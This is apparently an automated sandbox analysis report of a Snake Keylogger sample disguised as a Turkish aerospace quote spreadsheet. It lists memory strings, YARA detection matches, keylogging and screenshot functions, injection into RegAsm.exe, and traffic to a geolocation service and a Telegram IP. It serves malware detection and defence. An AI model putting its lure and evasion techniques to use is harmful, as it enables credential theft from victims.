Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.000000000307F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegAsm.exe, 00000003.00000002.4019025145.00000000030EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030EE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000003.00000002.4019025145.0000000003221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: RegAsm.exe, 00000003.00000002.4019025145.000000000321C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49728 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, COVID19.cs	.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, COVID19.cs	.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AD88B78	0_2_00007FFB4AD88B78
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AD88B70	0_2_00007FFB4AD88B70
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AD8E089	0_2_00007FFB4AD8E089
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AD83C60	0_2_00007FFB4AD83C60
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AD9407A	0_2_00007FFB4AD9407A
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AD8B120	0_2_00007FFB4AD8B120
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AD8B501	0_2_00007FFB4AD8B501
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AD864A0	0_2_00007FFB4AD864A0
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AD82630	0_2_00007FFB4AD82630
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AD864D3	0_2_00007FFB4AD864D3
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Code function: 0_2_00007FFB4AE503E3	0_2_00007FFB4AE503E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013F7118	3_2_013F7118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FC146	3_2_013FC146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FA088	3_2_013FA088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013F5362	3_2_013F5362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FD278	3_2_013FD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FC468	3_2_013FC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FC738	3_2_013FC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013F69A0	3_2_013F69A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FE988	3_2_013FE988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013F29E0	3_2_013F29E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FCA08	3_2_013FCA08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FCCD8	3_2_013FCCD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FCFAA	3_2_013FCFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FF631	3_2_013FF631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FE97A	3_2_013FE97A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013FFA88	3_2_013FFA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_013F3E09	3_2_013F3E09

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6740 -s 1028

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: No import functions for PE file found

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIjurumezayuviyawawF vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Binary or memory string: OriginalFilenameKatsina.exeH vs TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: Section: .rsrc ZLIB complexity 0.9942077536824877

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, ---.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@7/5@3/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6740

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\25681ab2-44a6-46f8-b91f-2ca91fabb62b

Jump to behavior

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.4019025145.00000000032E2000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

ReversingLabs: Detection: 52%

Source: unknown	Process created: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6740 -s 1028
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
